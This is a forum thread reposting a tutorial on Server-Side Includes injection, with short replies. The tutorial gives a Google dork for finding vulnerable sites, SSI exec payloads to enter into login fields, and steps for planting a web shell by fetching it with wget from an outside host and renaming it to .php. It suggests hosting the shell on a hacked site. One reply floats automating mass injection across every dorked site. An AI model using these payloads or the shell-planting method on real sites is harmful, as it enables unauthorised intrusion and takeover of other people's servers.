GreySec Forums

Full Version: [SSI] Server-Side Includes Injection. [Tutorial]
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
[SSI] Server-Side Includes Injection.

Just reposting som good and notable threads from my previous (now dead) home forum; Hacksociety.

Credits: ๖ۣۜΗ α x O r ♥

Things you will need:
  1. Site vulnerable to SSI injection (I will be giving few dorks and few vulnerable sites to practice on)
  2. Common sense.

What is SSI?

SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before they are inserted into a server-side interpreted HTML file.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

If an attacker submits a Server-side Include statement, he may have the ability to execute arbitrary operating system commands, or include a restricted file's contents the next time the page is served.

Source: Wikipedia/etc
Contents
Finding a vulnerable site
I will provide few dorks for this tipe of injection.
Best dork i found is inurl:bin/Cklb/ but it gave about 863 results so not that usable.

Lets get to work shall we

Enter inurl:bin/Cklb/ in Google and go testing...
Testing a site
So when you used that dork and you opened one site now you must determine id the site is vulnerable to this type of injection.

Here are some commands you can use:
Credits: Stewie™
Code [Expanded]:

<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"-->
Will show which user is running on the server

<!--#exec cmd="ls -a" --> (Linux)
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows)
Will display all files in the directory

Now take one of the commands and insert it in search boxes or login fields.
Mostly login fields are vulnerable but there is some cases when search boxes are vulnerable.

NOTE: You most enter your command into both fields (If login are vulnerable!!)

And when insert any command:
code Wrote:<!--#exec cmd="ls -a" -->

[Image: regionyo.png]

[Image: regionoq.png]

Now we see that our command successfully executed and that our site is vulnerable....
Spawning a shell
So we have our vulnerable site and we are ready to upload a shell.
First of all you will need a .TXT of your favourite shell (Host it somewhere free hosting,hacked site or anything you got)

Now we must download it to our site like this:
code Wrote:<!--#exec cmd="wget http://website.com/dir/shell.txt" -->

So insert your site where your shell is hosted in the command and you are ready to go.

Now just paste it into the fields and press Login or Enter.

[Image: regiontv.png]

To see if your .TXT file downloaded execute the command we used before:
Code Wrote:<!--#exec cmd="ls -a" -->

[Image: regionwt.png]

If you see that it downloaded successfully now you must rename it from .txt to .php!
You can use this command

code Wrote:<!--#exec cmd="mv shell.txt shell.php" -->

You rename filenames what ever you need (Offcourse you will need to put your .TXT name first.)

My command:

code Wrote:<!--#exec cmd="mv config1.txt config.php" -->

Now again list the files and try to find your file now.
If you did now just access it.

[Image: regionr.png]

That would be end of this tutorial.
I hope you learned something and do not rape sites with this
(Be smart and use them)

Further reading: https://owasp.org/www-community/attacks/..._Injection
God if there are sites out there that are still vulnerable to this... the developer should quite literally be taken out back and shot. They have no business being a developer.
(03-27-2020, 03:05 AM)MuddyBucket Wrote: [ -> ]God if there are sites out there that are still vulnerable to this... the developer should quite literally be taken out back and shot. They have no business being a developer.

Old, but gold Wink You never know what kind of ancient vulnerabilities still lurking in the deep. Plenty of applications running ancient code.... That makes me wonder how many sites are out there still open to attacks like RFI.. haha.

But yes, those developers should be shot in this day and age. Haha.
I'm half tempted to make a fork of DorkNet that automatically launches SSI injections on all sites it will collect using the dork you provided in the OP. Make it rain shells with a bit of luck.
(03-27-2020, 04:29 PM)Vector Wrote: [ -> ]I'm half tempted to make a fork of DorkNet that automatically launches SSI injections on all sites it will collect using the dork you provided in the OP. Make it rain shells with a bit of luck.

I'm not sure how updated the dork is nowadays Big Grin But I'm sure there's plenty of more dorks out there.
https://www.exploit-db.com/google-hacking-database